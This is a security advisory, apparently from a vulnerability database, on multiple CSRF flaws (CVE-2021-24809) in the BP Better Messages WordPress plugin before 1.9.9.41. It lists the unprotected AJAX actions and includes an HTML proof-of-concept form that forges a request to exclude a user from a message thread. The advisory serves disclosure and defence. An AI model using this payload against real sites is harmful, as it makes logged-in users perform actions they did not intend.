Lucene search
Brandon RoldanWPEX-ID:E186FEF4-DCA0-461F-B539-082C13A68D13HistoryOct 04, 2021 - 12:00 a.m.
BP Better Messages < 1.9.9.41 - Multiple CSRF
2021-10-0400:00:00
Brandon Roldan
253
cross-site request forgery
wordpress plugin
security exploit
EPSS
0.001
Percentile
47.5%
The plugin does not check for CSRF in multiple of its AJAX actions: bp_better_messages_leave_chat, bp_better_messages_join_chat, bp_messages_leave_thread, bp_messages_mute_thread, bp_messages_unmute_thread, bp_better_messages_add_user_to_thread, bp_better_messages_exclude_user_from_thread. This could allow attackers to make logged in users do unwanted actions
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="bp_better_messages_exclude_user_from_thread" />
<input type="hidden" name="user_id" value="4" />
<input type="hidden" name="thread_id" value="3" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
wpvulndb
wpvulndb
BP Better Messages < 1.9.9.41 - Multiple CSRF
2021-10-04 00:00:00
cnvd
cnvd
WordPress BP Better Messages plugin cross-site request forgery vulnerability
2021-11-04 00:00:00
cve
cve
CVE-2021-24809
2021-11-01 09:15:09
prion
prion
Cross site request forgery (csrf)
2021-11-01 09:15:00
cvelist
cvelist
CVE-2021-24809 BP Better Messages < 1.9.9.41 - Multiple CSRF
2021-11-01 08:46:30
nvd
nvd
CVE-2021-24809
2021-11-01 09:15:09
patchstack
patchstack